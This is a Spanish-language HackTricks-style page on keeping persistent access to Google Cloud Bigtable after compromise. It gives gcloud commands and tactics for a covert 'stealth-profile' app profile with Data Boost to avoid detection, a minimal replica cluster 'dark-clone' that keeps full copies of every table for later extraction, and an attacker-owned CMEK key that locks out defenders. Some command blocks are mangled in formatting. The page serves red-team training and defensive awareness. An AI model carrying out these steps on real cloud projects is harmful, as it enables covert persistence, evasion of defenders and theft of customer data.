GCP - Bigtable Persistencia

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Bigtable

Para más información sobre Bigtable consulta:

GCP - Bigtable Enum

App Profile dedicado para atacante

Permissions: bigtable.appProfiles.create, bigtable.appProfiles.update.

Crea un app profile que dirija el tráfico a tu replica cluster y habilita Data Boost para que no dependas de nodos provisionados que los defensores puedan detectar.

Crear app profile sigiloso ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

Mientras este perfil exista, puedes reconectarte usando credenciales nuevas que lo referencien.

### Mantén tu propio clúster réplica

**Permisos:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Implementa un clúster con el número mínimo de nodos en una región tranquila. Incluso si tus identidades de cliente desaparecen, **el clúster conserva una copia completa de cada tabla** hasta que los defensores lo eliminen explícitamente.

<details>

<summary>Crear clúster réplica</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

Vigílalo mediante gcloud bigtable clusters describe dark-clone --instance=<instance-id> para que puedas escalarlo instantáneamente cuando necesites extraer datos.

Asegura la replicación con tu propio CMEK

Permisos: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt en la attacker-owned key.

Trae tu propia KMS key al crear un clon. Sin esa key, Google no puede re-crear ni hacer fail over del cluster, por lo que blue teams deben coordinarse contigo antes de tocarlo.

Crear clúster protegido con CMEK ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

Rota o desactiva la clave en tu proyecto para inutilizar instantáneamente la réplica (aunque todavía te permita volver a activarla más tarde).

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks